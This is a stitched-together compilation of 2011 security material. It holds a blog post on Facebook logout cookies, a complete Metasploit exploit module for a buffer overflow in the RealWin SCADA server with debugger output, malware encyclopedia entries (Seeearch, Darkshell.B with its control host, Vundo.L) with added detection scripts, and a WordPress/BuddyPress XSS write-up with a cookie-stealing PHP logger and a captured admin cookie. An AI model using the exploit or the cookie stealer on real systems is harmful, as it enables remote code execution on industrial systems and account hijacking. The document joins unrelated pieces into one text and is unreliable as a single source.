30 September 2011

Facebook Fixes and Explains Logout Issue

I wrote a post two days ago about privacy issues with the Facebook logout procedure which could lead to your subsequent web requests to third-party sites that integrate Facebook widgets being identifiable and linked back to your real account. Over the course of the past 48 hours since that post was published we have researched the issue further and have been in constant contact with Facebook on working out solutions and clarifying behavior on the site.

My goal was both to identify bugs in the logout process and see that they are fixed, and to get some of the unanswered questions answered by Facebook, so that the Facebook-using public can be informed of how cookies are used on the site - especially with regard to third-party requests.

In summary, Facebook has made changes to the logout process and they have explained each part of the process and the cookies that the site uses in detail.

The Data

To help better understand the cookie data that we have collected, I have formatted it into a table that displays the lifetime of each cookie across a number of different web requests. The table can be found on a separate page here. You can find the raw output from my Firefox session here.

The rows of the table represent each cookie found throughout the debugging session. The first column is the name of the cookie. Each subsequent column shows how the value of the cookie was altered (or not) throughout the following four page requests:

  1. A logged in request to facebook.com
  2. A request to the 'logout' action within Facebook
  3. The immediate request of the Facebook homepage
  4. A subsequent request to the Facebook homepage after restarting the browser

The table is color coded so that it is easier to see which cookies are altered and which cookies never change. The data shows that five cookies retain value after the logout procedure and a browser restart, while a further two survive the logout procedure and remain as session cookies.
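The lifetime comparison that the table encodes can be automated. The following is an added example (not part of the original post or its captured data): it takes cookie-jar snapshots after the four requests above, classifies each cookie as cleared on logout, a session survivor or persistent, and decodes the timestamp/counter format of the act cookie. The snapshots are constructed; the cookie names are those from the post, but the values and the extra login_token cookie are made up.

```python
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# The four requests from the post, in order.
REQUESTS = ["logged in", "logout action", "homepage", "homepage after restart"]

# Constructed cookie-jar snapshots after each request (name -> value,
# None = the browser no longer holds the cookie). Cookie names are the ones
# named in the post; the values and 'login_token' are made up.
SNAPSHOTS: List[Dict[str, Optional[str]]] = [
    {"datr": "d1", "lu": "lu1", "p": "p1", "L": "2", "act": "1316962370811/2;",
     "a_user": "1234", "a_xs": "xs1", "login_token": "t1"},
    {"datr": "d1", "lu": "lu2", "p": "p1", "L": "2", "act": "1316972790935/11;",
     "a_user": "1234", "a_xs": "xs1", "login_token": None},
    {"datr": "d1", "lu": "lu2", "p": "p1", "L": "2", "act": "1317032073811/0;",
     "a_user": "1234", "a_xs": "xs1", "login_token": None},
    {"datr": "d1", "lu": "lu2", "p": "p1", "L": "2", "act": "1317032073999/0;",
     "a_user": None, "a_xs": None, "login_token": None},
]

# act cookie layout described in the post: <ms since epoch>/<counter>;
ACT_RE = re.compile(r"^(\d+)/(\d+);?$")


def classify(snapshots: List[Dict[str, Optional[str]]]) -> Dict[str, str]:
    """Map each cookie to how long it outlives the logout.

    'cleared on logout'  gone after the logout action or the next page load
    'session survivor'   survives logout but not the browser restart
    'persistent'         still held after the restart
    """
    names = sorted({n for snap in snapshots for n in snap})
    result: Dict[str, str] = {}
    for name in names:
        held = [snap.get(name) is not None for snap in snapshots]
        if not held[0]:
            result[name] = "never set while logged in"
        elif not (held[1] and held[2]):
            result[name] = "cleared on logout"
        elif not held[3]:
            result[name] = "session survivor"
        else:
            result[name] = "persistent"
    return result


def changed_on_logout(snapshots: List[Dict[str, Optional[str]]], name: str) -> bool:
    """True if the cookie's value after logout differs from its logged-in value."""
    return snapshots[0].get(name) != snapshots[2].get(name)


def decode_act(value: str) -> Tuple[datetime, int]:
    """Split an act cookie into its UTC timestamp and per-request counter."""
    m = ACT_RE.match(value.strip())
    if not m:
        raise ValueError(f"unexpected act value: {value!r}")
    ms, counter = int(m.group(1)), int(m.group(2))
    stamp = datetime.fromtimestamp(ms // 1000, tz=timezone.utc)
    return stamp.replace(microsecond=(ms % 1000) * 1000), counter


if __name__ == "__main__":
    for name, verdict in classify(SNAPSHOTS).items():
        note = " (value changed on logout)" if changed_on_logout(SNAPSHOTS, name) else ""
        print(f"{name:12} {verdict}{note}")
    stamp, counter = decode_act(SNAPSHOTS[0]["act"])
    print(f"act = {stamp.isoformat()} counter={counter}")
```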

The Fix

The five cookies that persist are datr, lu, p, L and act. The two cookies that also survive the logout procedure as session cookies are a_user and a_xs.

The most important of these is a_user, which is the user's ID. As of today, this cookie is destroyed on logout. Facebook had the following to say about the a_user cookie:

What you see in your browser is largely typical, except a_user which is less common and should be cleared upon logout (it is set on some photo upload pages). There is a bug where a_user was not cleared on logout. We will be fixing that today.

The other 'a' cookie, a_xs, is now also deleted on logout. a_xs is used to prevent cross-site request forgery (CSRF).

The Other Cookies

This leaves a number of other cookies, and I will be explaining the purpose of each one as per information from Facebook.

The datr cookie is set when a browser first visits facebook.com. Its purpose, as per Facebook, is:

We set the ‘datr’ cookie when a web browser accesses facebook.com (except social plugin iframes), and the cookie helps us identify suspicious login activity and keep users safe. For instance, we use it to flag questionable activity like failed login attempts and attempts to create multiple spam accounts.

The lu cookie is also set the first time a browser visits facebook.com, and is used to identify the browser and pre-fill the user's email address in the login form. Its purpose, as per Facebook again, is:

the ‘lu’ cookie helps protect people using public computers. The data it contains is used to make subtle changes to the login form, such as prefilling your email address and unchecking the “Keep me logged in” option if we detect multiple users signing in with the same browser. If you log out, this cookie does not contain your user id and Facebook will not prefill the email field.

These cookies, by the very purpose they serve, uniquely identify the browser being used - even after logout. As a user, you have to take Facebook at their word that these cookies are used only for what is described. The a_user cookie that was fixed identified your user account; these cookies identify the browser and are not re-associated with your logged-in account.

Most of the remaining cookies are not very interesting - they record things like the language of your browser and device dimensions. The most interesting cookie, for me (after the user ID, obviously), was act. The values of this cookie for the requests I logged were 1316962370811/2;, 1316972790935/11; and 1317032073811/0;. It is a timestamp for each request, in milliseconds since the UNIX epoch (1st January 1970). What interested me was not only that the timestamp was accurate to milliseconds (i.e. thousandths of a second) but that an additional number was appended to it. My gut instinct was that the additional number (i.e. the /11, /0 and /2 in those examples) was added to make the timestamp unique for each and every request. Facebook confirmed this:

It is a monotonically increasing counter of actions since the start of logging. As we shared, this is for the collection of performance data -- nothing else.

I understand the technical reason for that - they can store the timestamp as a primary key in their logging backend and not have to associate benchmarking of each request back to a user. I believe Facebook here when they say that although this is a unique identifier it isn't used to link back to a user id - but it is definitely being logged and it can be linked to a user.

Where Now

Facebook has changed as much as they can change with the logout issue. They want to retain the ability to track browsers after logout for safety and spam purposes, and they want to be able to log page requests for performance reasons. I would still recommend that users clear cookies or use a separate browser, though. I believe Facebook when they describe what these cookies are used for, but that is no reason to be complacent on privacy issues; take the initiative in remaining safe.

I discovered a lot of other issues and interesting areas ripe for further investigation while researching the cookie logout issue - and I will be taking each one of them up on the blog here in the near future.

I must thank Gregg Stefancik, an engineer at Facebook who reached out (and also left the 'official' Facebook response as a comment on the previous post) and who worked with us on this issue. Thank you as well to other Facebook engineers who reached out. On my end Ashkan Soltani and Brian Kennish (author of the excellent disconnect browser plugins that every user should be running) were invaluable with providing tests, advice and additional sets of eyes.




Source: http://nikcub.appspot.com/facebook-fixes-logout-issue-explains-cookies

realwin_on_fc_binfile_a.rb

##
# $Id: realwin_on_fc_binfile_a.rb 12975 2011-06-20 04:01:47Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::Seh

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
            'Description'    => %q{
                    This module exploits a vulnerability found in DATAC Control International RealWin
                SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
                packet via port 910, RealWin will try to create a file (which would be saved to
                C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
                supplied filename with an inline memcpy routine without proper bounds checking, which
                results in a stack-based buffer overflow, allowing arbitrary remote code execution.

                Tested version: 2.0 (Build 6.1.8.10)
            },
            'Author'         => [ 'Luigi Auriemma', 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 12975 $',
            'References'     =>
                [
                    [ 'URL', 'http://aluigi.altervista.org/adv/realwin_5-adv.txt' ],
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 450,
                    'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Universal', { 'Ret' => 0x4002da21 } ], # P/P/R FlexMLang.DLL 8.1.45.19
                ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Mar 21 2011'))

        register_options([Opt::RPORT(910)], self.class)
    end

    def exploit

        connect

        data =  [0x67542310].pack('V')
        data << [0x00000824].pack('V')
        data << [0x00100001].pack('V')
        data << [0x00000001].pack('V')  # Packet type
        data << [0x00060000].pack('V')
        data << [0x0000ffff].pack('V')
        data << rand_text_alpha_upper(221)
        data << generate_seh_payload(target.ret)
        data << rand_text_alpha_upper(17706 - payload.encoded.length)
        data << [0x451c3500].pack('V')
        data << [0x00000154].pack('V')
        data << [0x00020040].pack('V')

        print_status("Trying target #{target.name}...")
        sock.put(data)
        select(nil,nil,nil,0.5)

        handler
        disconnect

    end

end


=begin
0:022> r
eax=00000819 ebx=0587f89c ecx=00000039 edx=011fba04 esi=011fc138 edi=0587fffd
eip=0042702f esp=0587f738 ebp=011fba04 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
RealWinDemo+0x2702f:
0042702f f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:022> !exchain
0587f748: RealWinDemo+e0b78 (004e0b78)
0587f9a4: FlexMLang!GetFlexMLangIResourceBrowser+2b991 (4002da21)
Invalid exception stack at 49a206eb
0:022> u 4002da21
FlexMLang!GetFlexMLangIResourceBrowser+0x2b991:
4002da21 5e              pop     esi
4002da22 5b              pop     ebx
4002da23 c3              ret
=end

27 September 2011

Program:Win32/Seeearch

Aliases:

Program:Win32/Seeearch is also known as Adware.VlcPlayer (Dr.Web), IsolationAware (Sophos).

Explanation:

Program:Win32/Seeearch is a web browser toolbar that may be bundled with a fake setup application named "Vlc Media Player".

Installation

When run, the fake installer displays a graphic, an End User License Agreement and an error message (screenshots not reproduced here). It then drops the following files:
\Seeearch\seeearch.crc
\Seeearch\seeearch.dll
\Seeearch\start.html
\Seeearch\tbhelper.dll
\Seeearch\uninstall.exe
\Seeearch\update.exe
\Seeearch\21_pro.png
\Seeearch\58tuto02.jpg
\Seeearch\about.html
\Seeearch\basis.xml
\Seeearch\bookmark_256.png
\Seeearch\c1.png
\Seeearch\c2.png
\Seeearch\demo_logo.bmp
\Seeearch\demo_logo.bmp_16.bmp
\Seeearch\dice.png
\Seeearch\error.html
\Seeearch\facebook.png
\Seeearch\facebooklay.png
\Seeearch\favicon.ico
\Seeearch\football.png
\Seeearch\google_youtube.png
\Seeearch\icons.bmp
\Seeearch\icon_news.jpg
\Seeearch\kpat.png
\Seeearch\kpat2.png
\Seeearch\label_new_blue.png
\Seeearch\label_new_red.png
\Seeearch\littlelogo.png
\Seeearch\log.bmp
\Seeearch\log.bmp_30.bmp
\Seeearch\logotool.png
\Seeearch\logotoolbar.png
\Seeearch\loupe.png
\Seeearch\megaupload.png
\Seeearch\meteo.png
\Seeearch\money.png
\Seeearch\movies.png
\Seeearch\p1.png
\Seeearch\p2.png
\Seeearch\play.png
\Seeearch\refre.png
\Seeearch\refresh.png
\Seeearch\search_button_format_bing.png
\Seeearch\sims2_1.png
\Seeearch\social_youtube.png
\Seeearch\STREAM1.png
\Seeearch\STREAM2.png
\Seeearch\tweet.png
\Seeearch\twitter.png
\Seeearch\v1.png
\Seeearch\v2.png
\Seeearch\version.txt
\Seeearch\video.png
\Seeearch\weather.png
\Seeearch\youtube.png 

Note: we observed that in-the-wild samples of Win32/Seeearch use the following folder location as the "":
    D:\%ProgramFiles%

The registry is modified to run Win32/Seeearch as a Browser Helper Object.

In subkey: HKLM\Software\Microsoft\Internet Explorer\Toolbar
Sets value: "{1FDA7DDD-25CE-4034-9D5B-38A120A14218}"
To data: ""

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1
Sets value: "(default)"
To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar.1\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar
Sets value: "(default)"
To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CLSID
Sets value: "(default)"
To data: "{1fda7ddd-25ce-4034-9d5b-38a120a14218}"

In subkey: HKLM\SOFTWARE\Classes\TBSB06155.IEToolbar\CurVer
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}
Sets value: "(default)"
To data: "ie toolbar"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\ProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\VersionIndependentProgID
Sets value: "(default)"
To data: "tbsb06155.ietoolbar"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155.1\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CLSID
Sets value: "(default)"
To data: "{2da14d1d-ae74-4a74-a0fe-c79504755db8}"

In subkey: HKLM\SOFTWARE\Classes\Toolbar3.TBSB06155\CurVer
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155 class"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\ProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155.1"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\VersionIndependentProgID
Sets value: "(default)"
To data: "toolbar3.tbsb06155"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\InprocServer32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}
Sets value: "(default)"
To data: "tbsb06155"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0
Sets value: "(default)"
To data: "toolbar3 1.0 type library"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\FLAGS
Sets value: "(default)"
To data: "0"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\0\win32
Sets value: "(default)"
To data: "\seeearch\seeearch.dll"

In subkey: HKLM\SOFTWARE\Classes\TypeLib\{80D04E8E-7448-4D36-9161-5F89BF18DFDD}\1.0\HELPDIR
Sets value: "(default)"
To data: "\seeearch\"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}
Sets value: "(default)"
To data: "itoolbarobj"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{1BBB9F9A-8C7B-465B-827B-15C1B865E95C}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}
Sets value: "(default)"
To data: "iposbho"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\ProxyStubClsid32
Sets value: "(default)"
To data: "{00020424-0000-0000-c000-000000000046}"

In subkey: HKLM\SOFTWARE\Classes\Interface\{7C5C05AE-CBB0-4AC3-BAA8-BADB08254386}\TypeLib
Sets value: "(default)"
To data: "{80d04e8e-7448-4d36-9161-5f89bf18dfdd}"
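Hunting for registrations of this kind in a registry export, as an added example that is not part of the original analysis: it parses a .reg fragment modelled on the keys above, joins each Browser Helper Object and Internet Explorer toolbar CLSID to the DLL in its InprocServer32 key, and reports CLSIDs that have no COM server registered. The .reg text is constructed; the full DLL path and the orphan third entry are made up, not observed.

```python
import re
from typing import Dict, List, Optional

# Constructed .reg export modelled on the keys listed above. The full DLL
# path and the third (orphan) entry are made up for illustration.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar]
"{1FDA7DDD-25CE-4034-9D5B-38A120A14218}"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}]
@="tbsb06155"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1FDA7DDD-25CE-4034-9D5B-38A120A14218}\InprocServer32]
@="C:\\Program Files\\Seeearch\\seeearch.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2DA14D1D-AE74-4A74-A0FE-C79504755DB8}\InprocServer32]
@="C:\\Program Files\\Seeearch\\seeearch.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-0000-0000-0000-000000000001}]
@="constructed BHO whose CLSID has no COM server registered"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

HKLM = "hkey_local_machine\\"
BHO_ROOT = HKLM + r"software\microsoft\windows\currentversion\explorer\browser helper objects"
TOOLBAR_KEY = HKLM + r"software\microsoft\internet explorer\toolbar"
CLSID_ROOT = HKLM + r"software\classes\clsid"


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key (lower-cased): {value name (lower-cased, '' = default): data}}."""
    tree: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).lower()
            tree.setdefault(current, {})
            continue
        val = VAL_RE.match(line)
        if val and current is not None:
            name = "" if val.group(1) == "@" else val.group(1)[1:-1].lower()
            data = val.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                # REG_SZ: strip quotes and undo .reg escaping of backslash and quote.
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            tree[current][name] = data
    return tree


def ie_extensions(tree: Dict[str, Dict[str, str]]) -> List[Dict[str, Optional[str]]]:
    """List IE toolbars and BHOs, resolving each CLSID to its InprocServer32 DLL."""
    entries = []
    for key, values in tree.items():
        if key.startswith(BHO_ROOT + "\\"):
            entries.append(("bho", key[len(BHO_ROOT) + 1:], values.get("", "")))
    for name in tree.get(TOOLBAR_KEY, {}):
        if GUID_RE.fullmatch(name):
            entries.append(("toolbar", name, ""))
    records = []
    for kind, clsid, label in entries:
        server = tree.get(CLSID_ROOT + "\\" + clsid.lower() + "\\inprocserver32", {})
        records.append({"kind": kind, "clsid": clsid.upper(), "name": label,
                        "dll": server.get("")})  # None = no COM server registered
    return records


if __name__ == "__main__":
    for rec in ie_extensions(parse_reg(SAMPLE_REG)):
        flag = "  <-- no InprocServer32" if rec["dll"] is None else ""
        print(f"{rec['kind']:8} {rec['clsid']} {rec['name']!r} -> {rec['dll']}{flag}")
```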


When Internet Explorer is launched, Win32/Seeearch is visible as a toolbar. Program:Win32/Seeearch may display 'out-of-context' popup advertisements.

Analysis by Jonathan San Jose

Backdoor:Win32/Darkshell.B

Aliases:

There are no other names known for Backdoor:Win32/Darkshell.B.

Explanation:

Backdoor:Win32/Darkshell.B is a backdoor trojan that infects executable files and spreads through removable drives, as well as contacting a remote host in order to perform further malicious actions on the compromised computer.

Installation
Upon execution, Backdoor:Win32/Darkshell.B creates a copy of itself in the following file location and registers this copy as a service so it runs at each Windows start:

    \drivers\svchost.exe

Win32/Darkshell.B then launches this copy and deletes its original executable from the computer.

The backdoor also creates copies of itself in the following file locations using randomly generated file names:

    \.exe
    \drivers\.exe
    \dllcache\.exe
    \ime\.exe
    %ProgramFiles%\common files\microsoft shared\.exe
    %ProgramFiles%\internet explorer\connection wizard\.exe
    %ProgramFiles%\windows media player\.exe
    %windir%\addins\.exe
    %windir%\system\.exe


Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.

Spreads via...

Removable drives

Backdoor:Win32/Darkshell.B may receive instructions from a remote host to spread via removable drives. Darkshell.B may copy itself to any removable drives on the system using the file name "setup.exe", as well as creating an "autorun.inf" file in the drive that launches "setup.exe", if the Autorun feature is enabled on the compromised computer.

It should also be noted that autorun.inf files on their own are not necessarily a sign of infection, as they are used by legitimate programs and installation CDs.


Payload

Modifies executable files

Backdoor:Win32/Darkshell.B modifies files with ".exe" file extensions in all fixed drives so that when these files are launched, a copy of the malware is also executed. The modified files are detected as Virus:Win32/Luder.B. Backdoor:Win32/Darkshell.B avoids infecting files that are in the following directories:

    \Windows
    \WinNT
    \Windows NT
    \Documents and Settings
    \System Volume Information
    \Recycled
    \WindowsUpdate
    \Windows Media Player
    \Outlook Express
    \Internet Explorer
    \NetMeeting
    \ComPlus Applications
    \Messenger
    \Microsoft Frontpage
    \Movie Maker
    \NetMeeting



Contacts remote hosts

In the wild, we have observed Backdoor:Win32/Darkshell.B attempting to contact the following remote host through port 1981:

    hackpigpig.3322.org


The malware parses information received from the host to interpret other host servers with which to connect. Darkshell also sends system information to the host such as the system's computer name, Windows version, and amount of RAM.

Darkshell may also receive commands from the host that allow it to perform a number of actions on the infected computer, such as:

    Remove itself from the system
    Download and execute files
    Execute files
    Spread through removable drives



Downloads and executes arbitrary files

Through its backdoor component, Win32/Darkshell.B may receive instructions to download and execute an arbitrary file from a specific URL. If ordered to do so, the backdoor saves the file to the file location "C:\pagefile.pif" and executes it.



Analysis by Amir Fouda

TrojanDropper:Win32/Vundo.L

Aliases:

TrojanDropper:Win32/Vundo.L is also known as Trojan-Downloader.Win32.Wadolin (Ikarus), Infostealer.Gampass (Symantec).

Explanation:

TrojanDropper:Win32/Vundo.L is a trojan that is a member of a multi-component family of programs that deliver 'out of context' pop-up advertisements. It also drops files that are capable of downloading other malware.

Installation

TrojanDropper:Win32/Vundo.L drops a copy of itself as '\microsoft update.exe'.

Note: refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the Startup folder for Windows 9x, Me, NT, 2000, XP and 2003 is '%USERPROFILE%\Start Menu\Programs\Startup'. For Windows Vista and 7, the default location is '%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.



Payload

Drops files

The trojan drops '%TEMP%\mw.exe', which is detected as Trojan:Win32/Vundo.OD. It also drops '%TEMP%\.tmp.exe', which is detected as TrojanDownloader:Win32/Wadolin.A.

Opens a message box

TrojanDropper:Win32/Vundo.L shows a misleading message box to trick the users into believing that it failed to run because of a missing OCX file.



Changes Hosts file and its contents

The trojan makes a copy of the Windows Hosts file to '\drivers\etc\hîsts'. Note that the second character of the file name is the extended ASCII character 'EEh'.

It then adds the following lines to the Hosts file to divert access from the Russian social networking site "vKontakte.ru" to another IP address:

vkontakte.ru = 92.38.209.252
vk.com = 92.38.209.252


TrojanDropper:Win32/Vundo.L also sets the "hidden" attribute on the Hosts file, and inserts a lot of empty lines into the Hosts file to make it look unchanged upon casual inspection.
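Checking a Hosts file and its directory for the three signs described above (redirected entries, padding with empty lines, and a look-alike copy of the file), as an added example that is not part of the original analysis. The Hosts content and the directory listing are constructed, and the set of watched domains is an assumption; only the redirect IP is the one named in the analysis.

```python
from typing import List, Set, Tuple

# Constructed Hosts file modelled on the behaviour above: normal header,
# a long run of empty lines, then the two redirecting entries. The
# redirect target IP is the one named in the analysis.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    "127.0.0.1       localhost\n"
    "::1             localhost\n"
    + "\n" * 200
    + "92.38.209.252 vkontakte.ru\n"
    "92.38.209.252 vk.com\n"
)

# Constructed listing of the drivers\etc directory, including the look-alike
# copy ('h' + U+00EE + 'sts', i.e. 'EEh' as the second byte) described above.
SAMPLE_LISTING = ["hosts", "h\u00eests", "lmhosts.sam", "networks", "protocol", "services"]

# Assumed watchlist: domains whose Hosts entries should never leave loopback.
WATCHED_DOMAINS: Set[str] = {"vkontakte.ru", "vk.com"}
LOOPBACK = {"127.0.0.1", "::1", "0.0.0.0"}


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Return (ip, [hostnames]) for every effective line, comments removed."""
    entries = []
    for line in text.splitlines():
        body = line.split("#", 1)[0].strip()
        if not body:
            continue
        ip, *names = body.split()
        if names:
            entries.append((ip, [n.lower() for n in names]))
    return entries


def find_hijacks(entries: List[Tuple[str, List[str]]], watched: Set[str]) -> List[Tuple[str, str]]:
    """(hostname, ip) pairs where a watched domain resolves to a non-loopback address."""
    return [(n, ip) for ip, names in entries for n in names
            if n in watched and ip not in LOOPBACK]


def longest_blank_run(text: str) -> int:
    """Length of the longest run of empty lines (the padding trick described above)."""
    best = run = 0
    for line in text.splitlines():
        run = run + 1 if not line.strip() else 0
        best = max(best, run)
    return best


def lookalike_names(listing: List[str]) -> List[str]:
    """File names imitating 'hosts': non-ASCII characters or a single substituted character."""
    hits = []
    for name in listing:
        if name == "hosts":
            continue
        non_ascii = any(ord(c) > 127 for c in name)
        near_miss = len(name) == 5 and sum(a != b for a, b in zip(name.lower(), "hosts")) <= 1
        if non_ascii or near_miss:
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("hijacked entries :", find_hijacks(parse_hosts(SAMPLE_HOSTS), WATCHED_DOMAINS))
    print("longest blank run:", longest_blank_run(SAMPLE_HOSTS))
    print("look-alike files :", lookalike_names(SAMPLE_LISTING))
```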



Analysis by Horea Coroiu

Wordpress + Buddypress + Blogs Mu theme = XSS to Super Admin to Server Compromise

Cross-site scripting (XSS) vulnerabilities tend to be seen as one of the less serious security issues. Sometimes XSS can be serious, leading to complete server compromise...

Severity: High

Vulnerable setup:
PHP<=5.2 (tested on CentOS 5), Wordpress<=3.1.4, Buddypress<=1.2.10 (with bbPress forum integrated), Blogs Mu theme<=1.2.6

Victim box's IP:
192.168.0.11

Attacker box's IP:
192.168.0.4

By registering on the Wordpress site as a regular 'subscriber' (here I use 'regularuser' as the username) and then signing in, it is possible to submit the following javascript to the page at http://192.168.0.11/members/regularuser/settings/profile-css/ (in my test); the page can also be accessed via the themes bar at the top of the page:



The xss.php script looks as follows; it simply dumps the cookies of whichever user visits the http://192.168.0.11/members/regularuser/profile/ page (social engineering can be used to get particular users to visit this page):

<?php
$usercookies = fopen('cookies/cookies.txt', 'a');
fwrite($usercookies, "Site|Username|Page: " . urldecode($_GET['t']) .
    "\t" . "Cookie: " . urldecode($_GET['c']) . "\n");
fclose($usercookies);
?>

Opening the 'cookies/cookies.txt' file reveals the following
information (after the Wordpress super administrator has signed in and then
viewed the public profile for 'regularuser'):

Site|Username|Page: test site | regularuser | Profile   Cookie:
wordpress_test_cookie=WP Cookie check;
wordpress_logged_in_726e7da47eca03ddcae3e5e5966ad0d1=admin|1316627756|7c845a1bcf61927d4572ae0836ad7df4

